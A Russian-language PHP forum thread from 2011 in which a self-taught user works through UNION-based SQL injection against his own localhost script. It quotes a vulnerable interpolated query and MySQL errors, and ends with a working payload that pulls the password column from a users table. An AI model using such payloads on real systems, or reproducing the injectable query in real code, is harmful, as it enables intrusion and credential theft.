You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' LIMIT 1' at line 1
А если сделать так http://index.php?id=-1' UNION SELECT 1,2,3,4,5,6,7,8,9,10,11' , то все работает....
Потом, вот я типа подобрал кол-во столбцов, в моем случае 11, по коду выше выводит цифру 2. Но когда я пытаюсь ввести вместо этой цифры 2 login, то обламываюсь, типо
$query="SELECT * FROM `users` WHERE id='{$id}' LIMIT 1";
Мелкий
Отправлено: 06 Ноября, 2011 - 08:43:08
Активный участник
Покинул форум
Сообщений всего: 11926
Дата рег-ции: Июль 2009 Откуда: Россия, Санкт-Петербург
Помог: 618 раз(а)
Чтобы проводить SQL-инъекции, надо понимать SQL. Читайте, как работает union, какие ограничения имеет.
----- PostgreSQL DBA
etoYA
Отправлено: 06 Ноября, 2011 - 09:00:28
Участник
Покинул форум
Сообщений всего: 1859
Дата рег-ции: Июль 2011 Откуда: Крым
Помог: 21 раз(а)
Я не собераюсь их проводить, я лиж для интереса, для себя.... Зачем читать, если кто-то может сказать, и показать на практике... Все что знаю в пхп учил методом тыка, прочитал очень мало, считай самые основы (как обьявляются переменные, как делать цикл и.т.д). (Добавление)
я хочу выполнить запрос http://localhost/index.php?id=-1'UNION SELECT 1,login,3,4,5,6,7,8,9,10,11'
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' LIMIT 1' at line 1
Обьясните в чем ошибка, и я пойму это... (Добавление)
С синтаксисом разобрался, но есть одно но, и вот оно ))..
http://localhost/scripts/profile.php?id=-1'UNION+SELECT+null,password,null,null,null,null,null,null,null,null,null+FROM users WHERE id='1 /*
P.S то что хотел узнать, узна. LIME, метод тыка все же работает) (Добавление)
Эм... Ваш вариант то что надо !! , обьясните пожалуйста, что значит contact_ws ? (Добавление)
Разобрался с contact_ws
Все гости форума могут просматривать этот раздел. Только зарегистрированные пользователи могут создавать новые темы в этом разделе. Только зарегистрированные пользователи могут отвечать на сообщения в этом разделе.